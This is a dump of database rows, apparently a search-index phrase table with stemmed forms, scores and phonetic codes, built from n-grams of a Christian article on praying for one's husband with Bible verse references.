(197547, '21-24 he', '21-24 he', 0, 1, 1.2667, 'H000', 1, '*'),
(197548, '21-24 he will', '21-24 he will', 0, 1, 1.4333, 'H400', 1, '*'),
(197549, '25 28-30', '25 28-30', 0, 1, 1.2667, '', 1, '*'),
(197550, '25 28-30 god', '25 28-30 god', 0, 1, 1.4, 'G300', 1, '*'),
(197551, '26 2-3,gen', '26 2-3,gen', 0, 1, 1.3333, 'G500', 1, '*'),
(197552, '26 2-3,gen 28', '26 2-3,gen 28', 0, 1, 1.4333, 'G500', 1, '*'),
(197553, '28 13-16', '28 13-16', 0, 1, 1.2667, '', 1, '*'),
(197554, '28 13-16 exo', '28 13-16 exo', 0, 1, 1.4, 'E200', 1, '*'),
(197555, '28-30', '28-30', 0, 0, 0.5, '', 1, '*'),
(197556, '28-30 god', '28-30 god', 0, 1, 1.3, 'G300', 1, '*'),
(197557, '28-30 god to', '28-30 god to', 0, 1, 1.4, 'G300', 1, '*'),
(197558, '2chro', '2chro', 0, 0, 0.3333, 'C600', 1, '*'),
(197559, '2chro 18', '2chro 18', 0, 1, 1.2667, 'C600', 1, '*'),
(197560, '2chro 18 31', '2chro 18 31', 0, 1, 1.3667, 'C600', 1, '*'),
(197561, '3 1-2', '3 1-2', 0, 1, 1.1667, '', 1, '*'),
(197562, '3 1-2 josh', '3 1-2 josh', 0, 1, 1.3333, 'J000', 1, '*'),
(197563, '3 9', '3 9', 0, 1, 1.1, '', 1, '*'),
(197564, '3 9 gen', '3 9 gen', 0, 1, 1.2333, 'G500', 1, '*'),
(197565, '3 gen', '3 gen', 0, 1, 1.1667, 'G500', 1, '*'),
(197566, '3 gen 18', '3 gen 18', 0, 1, 1.2667, 'G500', 1, '*'),
(197567, '3 satan\'s', '3 satan', 0, 1, 1.3, 'S352', 1, '*'),
(197568, '3 satan\'s rod', '3 satan rod', 0, 1, 1.4333, 'S35263', 1, '*'),
(197569, '3-6 lord', '3-6 lord', 0, 1, 1.2667, 'L630', 1, '*'),
(197570, '3-6 lord appear', '3-6 lord appear', 0, 1, 1.5, 'L6316', 1, '*'),
(197571, '30 god', '30 god', 0, 1, 1.2, 'G300', 1, '*'),
(197572, '30 god to', '30 god to', 0, 1, 1.3, 'G300', 1, '*'),
(197573, '30 isaiah', '30 isaiah', 0, 1, 1.3, 'I200', 1, '*'),
(197574, '30 isaiah 65', '30 isaiah 65', 0, 1, 1.4, 'I200', 1, '*'),
(197575, '31 psalm', '31 psalm', 0, 1, 1.2667, 'P245', 1, '*'),
(197576, '31 psalm 68', '31 psalm 68', 0, 1, 1.3667, 'P245', 1, '*'),
(197577, '34', '34', 0, 0, 0.2, '', 2, '*'),
(197578, '34 prayer', '34 prayer', 0, 1, 1.3, 'P600', 1, '*'),
(197579, '4 6,gen', '4 6,gen', 0, 1, 1.2333, 'G500', 1, '*'),
(197580, '4 6,gen 6', '4 6,gen 6', 0, 1, 1.3, 'G500', 1, '*'),
(197581, '4 psalm', '4 psalm', 0, 1, 1.2333, 'P245', 1, '*'),
(197582, '4 psalm 121', '4 psalm 121', 0, 1, 1.3667, 'P245', 1, '*'),
(197583, '5 2chro', '5 2chro', 0, 1, 1.2333, 'C600', 1, '*'),
(197584, '5 2chro 18', '5 2chro 18', 0, 1, 1.3333, 'C600', 1, '*'),
(197585, '5-8 divine', '5-8 divine', 0, 1, 1.3333, 'D150', 1, '*'),
(197586, '5-8 divine protection', '5-8 divine protection', 0, 1, 1.7, 'D15163235', 1, '*'),
(197587, '6 13', '6 13', 0, 1, 1.1333, '', 1, '*'),
(197588, '6 13 gen', '6 13 gen', 0, 1, 1.2667, 'G500', 1, '*'),
(197589, '6 lord', '6 lord', 0, 1, 1.2, 'L630', 1, '*'),
(197590, '6 lord set', '6 lord set', 0, 1, 1.3333, 'L6323', 1, '*'),
(197591, '6 pray', '6 pray', 0, 1, 1.2, 'P600', 1, '*'),
(197592, '6 pray ps', '6 pray ps', 0, 1, 1.3, 'P612', 1, '*'),
(197593, '6,gen', '6,gen', 0, 0, 0.3333, 'G500', 1, '*'),
(197594, '6,gen 6', '6,gen 6', 0, 1, 1.2333, 'G500', 1, '*'),
(197595, '6,gen 6 13', '6,gen 6 13', 0, 1, 1.3333, 'G500', 1, '*'),
(197596, '65', '65', 0, 0, 0.2, '', 1, '*'),
(197597, '65 21-24', '65 21-24', 0, 1, 1.2667, '', 1, '*'),
(197598, '65 21-24 he', '65 21-24 he', 0, 1, 1.3667, 'H000', 1, '*'),
(197599, '65 introduction', '65 introduction', 0, 1, 1.5, 'I5363235', 1, '*'),
(197600, '65 introduction stop', '65 introduction stop', 0, 1, 1.6667, 'I5363235231', 1, '*'),
(197601, '68', '68', 0, 0, 0.2, '', 1, '*'),
(197602, '68 30', '68 30', 0, 1, 1.1667, '', 1, '*'),
(197603, '68 30 god', '68 30 god', 0, 1, 1.3, 'G300', 1, '*'),
(197604, '68 6', '68 6', 0, 1, 1.1333, '', 1, '*'),
(197605, '68 6 lord', '68 6 lord', 0, 1, 1.3, 'L630', 1, '*'),
(197606, '7 psalm', '7 psalm', 0, 1, 1.2333, 'P245', 1, '*'),
(197607, '7 psalm 128', '7 psalm 128', 0, 1, 1.3667, 'P245', 1, '*'),
(197608, '9 3-6', '9 3-6', 0, 1, 1.1667, '', 1, '*'),
(197609, '9 3-6 lord', '9 3-6 lord', 0, 1, 1.3333, 'L630', 1, '*'),
(197610, '9 gen', '9 gen', 0, 1, 1.1667, 'G500', 1, '*'),
(197611, '9 gen 4', '9 gen 4', 0, 1, 1.2333, 'G500', 1, '*'),
(197612, 'a fruitful', 'a fruitful', 0, 1, 1.3333, 'A16314', 1, '*'),
(197613, 'a fruitful vine', 'a fruitful vine', 0, 1, 1.5, 'A1631415', 1, '*'),
(197614, 'a god-ordained', 'a god-ordained', 0, 1, 1.4667, 'A236353', 1, '*'),
(197615, 'a god-ordained father', 'a god-ordained father', 0, 1, 1.7, 'A236353136', 1, '*'),
(197616, 'a greater', 'a greater', 0, 1, 1.3, 'A2636', 1, '*'),
(197617, 'a greater result', 'a greater result', 0, 1, 1.5333, 'A2636243', 1, '*'),
(197618, 'a husband', 'a husband', 0, 1, 1.3, 'A2153', 1, '*'),
(197619, 'a husband father', 'a husband father', 0, 1, 1.5333, 'A2153136', 1, '*'),
(197620, 'a ruler', 'a ruler', 0, 1, 1.2333, 'A646', 1, '*'),
(197621, 'a ruler leader', 'a ruler leader', 0, 1, 1.4667, 'A646436', 1, '*'),
(197622, 'a sure', 'a sure', 0, 1, 1.2, 'A260', 1, '*'),
(197623, 'a sure house', 'a sure house', 0, 1, 1.4, 'A262', 1, '*'),
(197624, 'abigail', 'abigail', 0, 0, 0.4667, 'A124', 1, '*'),
(197625, 'abigail prayed', 'abigail prayed', 0, 1, 1.4667, 'A124163', 1, '*'),
(197626, 'abigail prayed for', 'abigail prayed for', 0, 1, 1.6, 'A12416316', 1, '*'),
(197627, 'about your', 'about your', 0, 1, 1.3333, 'A136', 3, '*'),
(197628, 'about your husband', 'about your husband', 0, 1, 1.6, 'A1362153', 1, '*'),
(197629, 'abraham isaac', 'abraham isaac', 0, 1, 1.4333, 'A1652', 1, '*'),
(197630, 'abraham isaac jacob', 'abraham isaac jacob', 0, 1, 1.6333, 'A16521', 1, '*'),
(197631, 'acct', 'acct', 0, 0, 0.2667, 'A230', 1, '*'),
(197632, 'acct 9', 'acct 9', 0, 1, 1.2, 'A230', 1, '*'),
(197633, 'acct 9 3-6', 'acct 9 3-6', 0, 1, 1.3333, 'A230', 1, '*'),
(197634, 'adam noah', 'adam noah', 0, 1, 1.3, 'A350', 1, '*'),
(197635, 'adam noah abraham', 'adam noah abraham', 0, 1, 1.5667, 'A35165', 1, '*'),
(197636, 'against him', 'against him', 0, 1, 1.3667, 'A25235', 2, '*'),
(197637, 'against him stop', 'against him stop', 0, 1, 1.5333, 'A25235231', 1, '*'),
(197638, 'agenda', 'agenda', 0, 0, 0.4, 'A253', 2, '*'),
(197639, 'agenda of', 'agenda of', 0, 1, 1.3, 'A2531', 1, '*'),
(197640, 'agenda of god', 'agenda of god', 0, 1, 1.4333, 'A253123', 1, '*'),
(197641, 'all malice', 'all malice', 0, 1, 1.3333, 'A4542', 1, '*'),
(197642, 'all malice bickering', 'all malice bickering', 0, 1, 1.6667, 'A454212652', 1, '*'),
(197643, 'all the good', 'all the good', 0, 1, 1.4, 'A4323', 1, '*'),
(197644, 'among god-fearing', 'among god-fearing', 0, 1, 1.5667, 'A5231652', 1, '*'),
(197645, 'among god-fearing friends', 'among god-fearing friends', 0, 1, 1.8333, 'A523165216532', 1, '*'),
(197646, 'and bringing', 'and bringing', 0, 1, 1.4, 'A53165252', 1, '*'),
(197647, 'and bringing multiple', 'and bringing multiple', 0, 1, 1.7, 'A5316525254314', 1, '*'),
(197648, 'and down', 'and down', 0, 1, 1.2667, 'A535', 1, '*'),
(197649, 'and down 5', 'and down 5', 0, 1, 1.3333, 'A535', 1, '*'),
(197650, 'and failure', 'and failure', 0, 1, 1.3667, 'A53146', 1, '*'),
(197651, 'and failure stop', 'and failure stop', 0, 1, 1.5333, 'A53146231', 1, '*'),
(197652, 'and operate', 'and operate', 0, 1, 1.3667, 'A53163', 1, '*'),
(197653, 'and operate in', 'and operate in', 0, 1, 1.4667, 'A531635', 1, '*'),
(197654, 'and partake', 'and partake', 0, 1, 1.3667, 'A531632', 1, '*'),
(197655, 'and partake of', 'and partake of', 0, 1, 1.4667, 'A5316321', 1, '*'),
(197656, 'and rancour', 'and rancour', 0, 1, 1.3667, 'A536526', 1, '*'),
(197657, 'and rancour stop', 'and rancour stop', 0, 1, 1.5333, 'A536526231', 1, '*'),
(197658, 'and step', 'and step', 0, 1, 1.2667, 'A53231', 1, '*'),
(197659, 'and step 4', 'and step 4', 0, 1, 1.3333, 'A53231', 1, '*'),
(197660, 'and walk', 'and walk', 0, 1, 1.2667, 'A5342', 1, '*'),
(197661, 'and walk in', 'and walk in', 0, 1, 1.3667, 'A53425', 1, '*'),
(197662, 'appear to', 'appear to', 0, 1, 1.3, 'A163', 1, '*'),
(197663, 'appear to him', 'appear to him', 0, 1, 1.4333, 'A1635', 1, '*'),
(197664, 'appoint', 'appoint', 0, 0, 0.4667, 'A153', 1, '*'),
(197665, 'appoint him', 'appoint him', 0, 1, 1.3667, 'A1535', 1, '*'),
(197666, 'appoint him a', 'appoint him a', 0, 1, 1.4333, 'A1535', 1, '*'),
(197667, 'are prayers', 'ar prayers', 0, 1, 1.3667, 'A6162', 1, '*'),
(197668, 'are prayers to', 'ar prayers to', 0, 1, 1.4667, 'A61623', 1, '*'),
(197669, 'are you to', 'ar you to', 0, 1, 1.3333, 'A630', 1, '*'),
(197670, 'as a husband', 'as a husband', 0, 1, 1.4, 'A2153', 1, '*'),
(197671, 'as he goes', 'as he goes', 0, 1, 1.3333, 'A200', 1, '*'),
(197672, 'as he steps', 'as he steps', 0, 1, 1.3667, 'A2312', 1, '*'),
(197673, 'as olive', 'as olive', 0, 1, 1.2667, 'A241', 1, '*'),
(197674, 'as olive plants', 'as olive plants', 0, 1, 1.5, 'A2414532', 1, '*'),
(197675, 'as you did', 'as you did', 0, 1, 1.3333, 'A230', 1, '*'),
(197676, 'at him', 'at him', 0, 1, 1.2, 'A350', 1, '*'),
(197677, 'at him stop', 'at him stop', 0, 1, 1.3667, 'A35231', 1, '*'),
(197678, 'at him talk', 'at him talk', 0, 1, 1.3667, 'A35342', 1, '*'),
(197679, 'at home', 'at home', 0, 1, 1.2333, 'A350', 1, '*'),
(197680, 'at home in', 'at home in', 0, 1, 1.3333, 'A350', 1, '*'),
(197681, 'at work', 'at work', 0, 1, 1.2333, 'A362', 1, '*'),
(197682, 'at work at', 'at work at', 0, 1, 1.3333, 'A3623', 1, '*'),
(197683, 'away him', 'awai him', 0, 1, 1.2667, 'A500', 1, '*'),
(197684, 'away him destroyers', 'awai him destroyers', 0, 1, 1.6333, 'A532362', 1, '*'),
(197685, 'based prayers', 'base prayers', 0, 1, 1.4333, 'B23162', 1, '*'),
(197686, 'based prayers can', 'base prayers can', 0, 1, 1.5667, 'B231625', 1, '*'),
(197687, 'be a fruitful', 'be a fruitful', 0, 1, 1.4333, 'B6314', 1, '*'),
(197688, 'be a greater', 'be a greater', 0, 1, 1.4, 'B2636', 1, '*'),
(197689, 'be fulfilled', 'be fulfilled', 0, 1, 1.4, 'B4143', 1, '*'),
(197690, 'be fulfilled it', 'be fulfilled it', 0, 1, 1.5, 'B4143', 1, '*'),
(197691, 'be seen', 'be seen', 0, 1, 1.2333, 'B250', 1, '*'),
(197692, 'be seen stop', 'be seen stop', 0, 1, 1.4, 'B25231', 1, '*'),
(197693, 'becomes as', 'becom as', 0, 1, 1.3333, 'B252', 1, '*'),
(197694, 'becomes as a', 'becom as a', 0, 1, 1.4, 'B252', 1, '*'),
(197695, 'being use', 'be use', 0, 1, 1.3, 'B520', 1, '*'),
(197696, 'being use your', 'be use your', 0, 1, 1.4667, 'B526', 1, '*'),
(197697, 'below are prayers', 'below are prayers', 0, 1, 1.5667, 'B46162', 1, '*'),
(197698, 'better he', 'better he', 0, 1, 1.3, 'B360', 1, '*'),
(197699, 'better he becomes', 'better he becomes', 0, 1, 1.5667, 'B361252', 1, '*'),
(197700, 'bible he', 'bibl he', 0, 1, 1.2667, 'B400', 1, '*'),
(197701, 'bible he will', 'bibl he will', 0, 1, 1.4333, 'B400', 1, '*'),
(197702, 'bickering', 'bicker', 0, 0, 0.6, 'B2652', 1, '*'),
(197703, 'bickering and', 'bicker and', 0, 1, 1.4333, 'B265253', 1, '*'),
(197704, 'bickering and rancour', 'bicker and rancour', 0, 1, 1.7, 'B2652536526', 1, '*'),
(197705, 'bind', 'bind', 0, 0, 0.2667, 'B530', 1, '*'),
(197706, 'bind his', 'bind his', 0, 1, 1.2667, 'B532', 1, '*'),
(197707, 'bind his soul', 'bind his soul', 0, 1, 1.4333, 'B5324', 1, '*'),
(197708, 'bitter', 'bitter', 0, 0, 0.4, 'B360', 1, '*'),
(197709, 'bitter at', 'bitter at', 0, 1, 1.3, 'B363', 1, '*'),
(197710, 'bitter at him', 'bitter at him', 0, 1, 1.4333, 'B3635', 1, '*'),
(197711, 'blessings to', 'bless to', 0, 1, 1.4, 'B42523', 3, '*'),
(197712, 'blessings to the', 'bless to the', 0, 1, 1.5333, 'B42523', 1, '*'),
(197713, 'bringing', 'bring', 0, 0, 0.5333, 'B65252', 5, '*'),
(197714, 'bringing multiple', 'bring multiple', 0, 1, 1.5667, 'B6525254314', 1, '*'),
(197715, 'bringing multiple blessings', 'bring multiple blessings', 0, 1, 1.9, 'B652525431414252', 1, '*'),
(197716, 'bundle', 'bundl', 0, 0, 0.4, 'B534', 1, '*'),
(197717, 'bundle of', 'bundl of', 0, 1, 1.3, 'B5341', 1, '*'),
(197718, 'bundle of life', 'bundl of life', 0, 1, 1.4667, 'B534141', 1, '*'),
(197719, 'can be seen', 'can be seen', 0, 1, 1.3667, 'C5125', 1, '*'),
(197720, 'can make all', 'can make all', 0, 1, 1.4, 'C524', 1, '*'),
(197721, 'can move', 'can move', 0, 1, 1.2667, 'C510', 1, '*'),
(197722, 'can move god', 'can move god', 0, 1, 1.4, 'C5123', 1, '*'),
(197723, 'change him', 'chang him', 0, 1, 1.3333, 'C525', 1, '*'),
(197724, 'change him as', 'chang him as', 0, 1, 1.4333, 'C5252', 1, '*'),
(197725, 'children as', 'children as', 0, 1, 1.3667, 'C43652', 2, '*'),
(197726, 'children as olive', 'children as olive', 0, 1, 1.5667, 'C4365241', 1, '*'),
(197727, 'children finally', 'children finally', 0, 1, 1.5333, 'C4365154', 1, '*'),
(197728, 'children finally pray', 'children finally pray', 0, 1, 1.7, 'C436515416', 1, '*'),
(197729, 'children\'s', 'children', 0, 0, 0.6667, 'C43652', 1, '*'),
(197730, 'children\'s children', 'children children', 0, 1, 1.6333, 'C436524365', 1, '*'),
(197731, 'children\'s children finally', 'children children finally', 0, 1, 1.9, 'C436524365154', 1, '*'),
(197732, 'church 7', 'church 7', 0, 1, 1.2667, 'C620', 2, '*'),
(197733, 'church 7 psalm', 'church 7 psalm', 0, 1, 1.4667, 'C621245', 1, '*'),
(197734, 'comfort', 'comfort', 0, 0, 0.4667, 'C5163', 2, '*'),
(197735, 'comfort you', 'comfort you', 0, 1, 1.3667, 'C5163', 1, '*'),
(197736, 'comfort you are', 'comfort you are', 0, 1, 1.5, 'C51636', 1, '*'),
(197737, 'comparing', 'compar', 0, 0, 0.6, 'C51652', 1, '*'),
(197738, 'comparing him', 'compar him', 0, 1, 1.4333, 'C516525', 1, '*'),
(197739, 'comparing him with', 'compar him with', 0, 1, 1.6, 'C5165253', 1, '*'),
(197740, 'comparing yourself', 'compar yourself', 0, 1, 1.6, 'C516526241', 1, '*'),
(197741, 'comparing yourself with', 'compar yourself with', 0, 1, 1.7667, 'C5165262413', 1, '*'),
(197742, 'competing', 'compet', 0, 0, 0.6, 'C51352', 1, '*'),
(197743, 'competing against', 'compet against', 0, 1, 1.5667, 'C51352523', 1, '*'),
(197744, 'competing against him', 'compet against him', 0, 1, 1.7, 'C513525235', 1, '*'),
(197745, 'complaining about', 'complain about', 0, 1, 1.5667, 'C5145213', 1, '*'),
(197746, 'complaining about your', 'complain about your', 0, 1, 1.7333, 'C51452136', 1, '*'),
(197747, 'concerning him', 'concern him', 0, 1, 1.4667, 'C526525', 1, '*'),
(197748, 'concerning him god', 'concern him god', 0, 1, 1.6, 'C52652523', 1, '*'),
(197749, 'confusionists', 'confusionist', 0, 0, 0.8667, 'C5125232', 1, '*'),
(197750, 'confusionists etc', 'confusionist etc', 0, 1, 1.5667, 'C512523232', 1, '*'),
(197751, 'confusionists etc 6', 'confusionist etc 6', 0, 1, 1.6333, 'C512523232', 1, '*'),
(197752, 'david 1sam', 'david 1sam', 0, 1, 1.3333, 'D1325', 1, '*'),
(197753, 'david 1sam 25', 'david 1sam 25', 0, 1, 1.4333, 'D1325', 1, '*'),
(197754, 'days he', 'dai he', 0, 1, 1.2333, 'D200', 1, '*'),
(197755, 'days he will', 'dai he will', 0, 1, 1.4, 'D240', 1, '*'),
(197756, 'deceivers', 'deceiv', 0, 0, 0.6, 'D2162', 1, '*'),
(197757, 'deceivers confusionists', 'deceiv confusionists', 0, 1, 1.7667, 'D21625125232', 1, '*'),
(197758, 'deceivers confusionists etc', 'deceiv confusionists etc', 0, 1, 1.9, 'D2162512523232', 1, '*'),
(197759, 'designed', 'design', 0, 0, 0.5333, 'D253', 2, '*'),
(197760, 'designed ordained', 'design ordained', 0, 1, 1.5667, 'D2536353', 1, '*'),
(197761, 'designed ordained for', 'design ordained for', 0, 1, 1.7, 'D253635316', 1, '*'),
(197762, 'destroyers', 'destroy', 0, 0, 0.6667, 'D2362', 1, '*'),
(197763, 'destroyers seducers', 'destroy seducers', 0, 1, 1.6333, 'D23623262', 1, '*'),
(197764, 'destroyers seducers deceivers', 'destroy seducers deceivers', 0, 1, 1.9667, 'D2362326232162', 1, '*'),
(197765, 'did for', 'did for', 0, 1, 1.2333, 'D160', 1, '*'),
(197766, 'did for adam', 'did for adam', 0, 1, 1.4, 'D1635', 1, '*'),
(197767, 'did it in', 'did it in', 0, 1, 1.3, 'D500', 1, '*'),
(197768, 'difference your', 'differ your', 0, 1, 1.5, 'D16526', 1, '*'),
(197769, 'difference your prayer', 'differ your prayer', 0, 1, 1.7333, 'D1652616', 1, '*'),
(197770, 'direct him', 'direct him', 0, 1, 1.3333, 'D6235', 1, '*'),
(197771, 'direct him lord', 'direct him lord', 0, 1, 1.5, 'D6235463', 1, '*'),
(197772, 'directions and', 'direct and', 0, 1, 1.4667, 'D6235253', 1, '*'),
(197773, 'directions and step', 'direct and step', 0, 1, 1.6333, 'D6235253231', 1, '*'),
(197774, 'divine protection', 'divin protection', 0, 1, 1.5667, 'D15163235', 1, '*'),
(197775, 'divine protection as', 'divin protection as', 0, 1, 1.6667, 'D151632352', 1, '*'),
(197776, 'do for', 'do for', 0, 1, 1.2, 'D160', 1, '*'),
(197777, 'do for him', 'do for him', 0, 1, 1.3333, 'D165', 1, '*'),
(197778, 'do it today', 'do it today', 0, 1, 1.3667, 'D000', 1, '*'),
(197779, 'do pray', 'do pray', 0, 1, 1.2333, 'D160', 1, '*'),
(197780, 'do pray pray', 'do pray pray', 0, 1, 1.4, 'D1616', 1, '*'),
(197781, 'down 5', 'down 5', 0, 1, 1.2, 'D500', 1, '*'),
(197782, 'down 5 2chro', 'down 5 2chro', 0, 1, 1.4, 'D526', 1, '*'),
(197783, 'due rewards', 'due rewards', 0, 1, 1.3667, 'D632', 1, '*'),
(197784, 'due rewards for', 'due rewards for', 0, 1, 1.5, 'D63216', 1, '*'),
(197785, 'eat the', 'eat the', 0, 1, 1.2333, 'E300', 2, '*'),
(197786, 'eat the good', 'eat the good', 0, 1, 1.4, 'E323', 2, '*'),
(197787, 'eat the labour', 'eat the labour', 0, 1, 1.4667, 'E3416', 1, '*'),
(197788, 'encounter', 'encount', 0, 0, 0.6, 'E52536', 4, '*'),
(197789, 'encounter him', 'encount him', 0, 1, 1.4333, 'E525365', 1, '*'),
(197790, 'encounter him lord', 'encount him lord', 0, 1, 1.6, 'E525365463', 1, '*'),
(197791, 'enemies out', 'enemi out', 0, 1, 1.3667, 'E523', 1, '*'),
(197792, 'enemies out god', 'enemi out god', 0, 1, 1.5, 'E52323', 1, '*'),
(197793, 'etc 6', 'etc 6', 0, 1, 1.1667, 'E320', 1, '*'),
(197794, 'etc 6 pray', 'etc 6 pray', 0, 1, 1.3333, 'E3216', 1, '*'),
(197795, 'exo', 'exo', 0, 0, 0.2, 'E200', 1, '*'),
(197796, 'exo 3', 'exo 3', 0, 1, 1.1667, 'E200', 1, '*'),
(197797, 'exo 3 1-2', 'exo 3 1-2', 0, 1, 1.3, 'E200', 1, '*'),
(197798, 'failure stop', 'failur stop', 0, 1, 1.4, 'F46231', 1, '*'),
(197799, 'failure stop comparing', 'failur stop comparing', 0, 1, 1.7333, 'F46231251652', 1, '*'),
(197800, 'faith scripture', 'faith scripture', 0, 1, 1.5, 'F326136', 1, '*'),
(197801, 'faith scripture based', 'faith scripture based', 0, 1, 1.7, 'F326136123', 1, '*'),
(197802, 'family women', 'famili women', 0, 1, 1.4, 'F545', 3, '*'),
(197803, 'father among', 'father among', 0, 1, 1.4, 'F3652', 1, '*'),
(197804, 'father among god-fearing', 'father among god-fearing', 0, 1, 1.8, 'F365231652', 1, '*'),
(197805, 'father human', 'father human', 0, 1, 1.4, 'F365', 1, '*'),
(197806, 'father human being', 'father human being', 0, 1, 1.6, 'F365152', 1, '*'),
(197807, 'fight his', 'fight his', 0, 1, 1.3, 'F232', 1, '*'),
(197808, 'fight his battles', 'fight his battles', 0, 1, 1.5667, 'F2321342', 1, '*'),
(197809, 'finally', 'final', 0, 0, 0.4667, 'F540', 1, '*'),
(197810, 'finally pray', 'final pray', 0, 1, 1.4, 'F5416', 1, '*'),
(197811, 'finally pray the', 'final pray the', 0, 1, 1.5333, 'F54163', 1, '*'),
(197812, 'for adam', 'for adam', 0, 1, 1.2667, 'F635', 1, '*'),
(197813, 'for adam noah', 'for adam noah', 0, 1, 1.4333, 'F635', 1, '*'),
(197814, 'for david 1sam', 'for david 1sam', 0, 1, 1.4667, 'F631325', 1, '*'),
(197815, 'for hard', 'for hard', 0, 1, 1.2667, 'F630', 1, '*'),
(197816, 'for hard labour', 'for hard labour', 0, 1, 1.5, 'F63416', 1, '*'),
(197817, 'for him all', 'for him all', 0, 1, 1.3667, 'F654', 1, '*'),
(197818, 'for him his', 'for him his', 0, 1, 1.3667, 'F652', 1, '*'),
(197819, 'for him the', 'for him the', 0, 1, 1.3667, 'F653', 1, '*'),
(197820, 'for him your', 'for him your', 0, 1, 1.4, 'F656', 1, '*'),
(197821, 'for your husband', 'for your husband', 0, 1, 1.5333, 'F62153', 1, '*'),
(197822, 'friends 3', 'friend 3', 0, 1, 1.3, 'F6532', 1, '*'),
(197823, 'friends 3 gen', 'friend 3 gen', 0, 1, 1.4333, 'F65325', 1, '*'),
(197824, 'from him open', 'from him open', 0, 1, 1.4333, 'F6515', 1, '*'),
(197825, 'fruitful vine', 'fruit vine', 0, 1, 1.4333, 'F631415', 1, '*'),
(197826, 'fruitful vine for', 'fruit vine for', 0, 1, 1.5667, 'F63141516', 1, '*'),
(197827, 'fulfilled it', 'fulfil it', 0, 1, 1.4, 'F4143', 1, '*'),
(197828, 'fulfilled it will', 'fulfil it will', 0, 1, 1.5667, 'F41434', 1, '*'),
(197829, 'gen 12', 'gen 12', 0, 1, 1.2, 'G500', 1, '*'),
(197830, 'gen 12 1-3', 'gen 12 1-3', 0, 1, 1.3333, 'G500', 1, '*'),
(197831, 'gen 18', 'gen 18', 0, 1, 1.2, 'G500', 1, '*'),
(197832, 'gen 18 18-19', 'gen 18 18-19', 0, 1, 1.4, 'G500', 1, '*'),
(197833, 'gen 2 16', 'gen 2 16', 0, 1, 1.2667, 'G500', 1, '*'),
(197834, 'gen 26', 'gen 26', 0, 1, 1.2, 'G500', 1, '*'),
(197835, 'gen 26 2-3,gen', 'gen 26 2-3,gen', 0, 1, 1.4667, 'G525', 1, '*'),
(197836, 'gen 3', 'gen 3', 0, 1, 1.1667, 'G500', 2, '*'),
(197837, 'gen 3 9', 'gen 3 9', 0, 1, 1.2333, 'G500', 1, '*'),
(197838, 'gen 4', 'gen 4', 0, 1, 1.1667, 'G500', 2, '*'),
(197839, 'gen 4 6,gen', 'gen 4 6,gen', 0, 1, 1.3667, 'G525', 1, '*'),
(197840, 'getting bitter', 'get bitter', 0, 1, 1.4667, 'G352136', 1, '*'),
(197841, 'getting bitter at', 'get bitter at', 0, 1, 1.5667, 'G3521363', 1, '*'),
(197842, 'glory god', 'glori god', 0, 1, 1.3, 'G4623', 1, '*'),
(197843, 'glory god has', 'glori god has', 0, 1, 1.4333, 'G46232', 1, '*'),
(197844, 'god and god', 'god and god', 0, 1, 1.3667, 'G35323', 2, '*'),
(197845, 'god has designed', 'god has designed', 0, 1, 1.5333, 'G323253', 1, '*'),
(197846, 'god in his', 'god in his', 0, 1, 1.3333, 'G352', 1, '*'),
(197847, 'god is no', 'god is no', 0, 1, 1.3, 'G325', 1, '*'),
(197848, 'god talks', 'god talks', 0, 1, 1.3, 'G342', 1, '*'),
(197849, 'god talks to', 'god talks to', 0, 1, 1.4, 'G3423', 1, '*'),
(197850, 'god to appoint', 'god to appoint', 0, 1, 1.4667, 'G3153', 1, '*'),
(197851, 'god to bind', 'god to bind', 0, 1, 1.3667, 'G3153', 1, '*'),
(197852, 'god to fight', 'god to fight', 0, 1, 1.4, 'G3123', 1, '*'),
(197853, 'god to make', 'god to make', 0, 1, 1.3667, 'G352', 1, '*'),
(197854, 'god to move', 'god to move', 0, 1, 1.3667, 'G351', 1, '*'),
(197855, 'god will move', 'god will move', 0, 1, 1.4333, 'G3451', 1, '*'),
(197856, 'god will talk', 'god will talk', 0, 1, 1.4333, 'G34342', 1, '*'),
(197857, 'god-fearing', 'god-fear', 0, 0, 0.7333, 'G31652', 1, '*'),
(197858, 'god-fearing friends', 'god-fear friends', 0, 1, 1.6333, 'G3165216532', 1, '*'),
(197859, 'god-fearing friends 3', 'god-fear friends 3', 0, 1, 1.7, 'G3165216532', 1, '*'),
(197860, 'god-ordained', 'god-ordain', 0, 0, 0.8, 'G36353', 1, '*'),
(197861, 'god-ordained father', 'god-ordain father', 0, 1, 1.6333, 'G36353136', 1, '*'),
(197862, 'god-ordained father among', 'god-ordain father among', 0, 1, 1.8333, 'G3635313652', 1, '*'),
(197863, 'goes up', 'goe up', 0, 1, 1.2333, 'G100', 1, '*'),
(197864, 'goes up and', 'goe up and', 0, 1, 1.3667, 'G153', 1, '*'),
(197865, 'good and', 'good and', 0, 1, 1.2667, 'G353', 3, '*'),
(197866, 'good and partake', 'good and partake', 0, 1, 1.5333, 'G3531632', 1, '*'),
(197867, 'good that', 'good that', 0, 1, 1.3, 'G300', 1, '*'),
(197868, 'good that he', 'good that he', 0, 1, 1.4, 'G300', 1, '*'),
(197869, 'greater', 'greater', 0, 0, 0.4667, 'G636', 1, '*'),
(197870, 'greater result', 'greater result', 0, 1, 1.4667, 'G636243', 1, '*'),
(197871, 'greater result that', 'greater result that', 0, 1, 1.6333, 'G636243', 1, '*'),
(197872, 'growing', 'grow', 0, 0, 0.4667, 'G652', 2, '*'),
(197873, 'growing well', 'grow well', 0, 1, 1.4, 'G6524', 1, '*'),
(197874, 'growing well and', 'grow well and', 0, 1, 1.5333, 'G652453', 1, '*'),
(197875, 'hands due', 'hand due', 0, 1, 1.3, 'H5323', 1, '*'),
(197876, 'hands due rewards', 'hand due rewards', 0, 1, 1.5667, 'H5323632', 1, '*'),
(197877, 'hard', 'hard', 0, 0, 0.2667, 'H630', 5, '*'),
(197878, 'hard labour', 'hard labour', 0, 1, 1.3667, 'H63416', 1, '*'),
(197879, 'hard labour isaiah', 'hard labour isaiah', 0, 1, 1.6, 'H634162', 1, '*'),
(197880, 'harvests', 'harvest', 0, 0, 0.5333, 'H61232', 1, '*'),
(197881, 'harvests of', 'harvest of', 0, 1, 1.3667, 'H612321', 1, '*'),
(197882, 'harvests of sweet', 'harvest of sweet', 0, 1, 1.5667, 'H61232123', 1, '*'),
(197883, 'has designed', 'ha designed', 0, 1, 1.4, 'H23253', 1, '*'),
(197884, 'has designed ordained', 'ha designed ordained', 0, 1, 1.7, 'H232536353', 1, '*'),
(197885, 'has spoken concerning', 'ha spoken concerning', 0, 1, 1.7, 'H2125252652', 1, '*'),
(197886, 'have success', 'have success', 0, 1, 1.4, 'H120', 1, '*'),
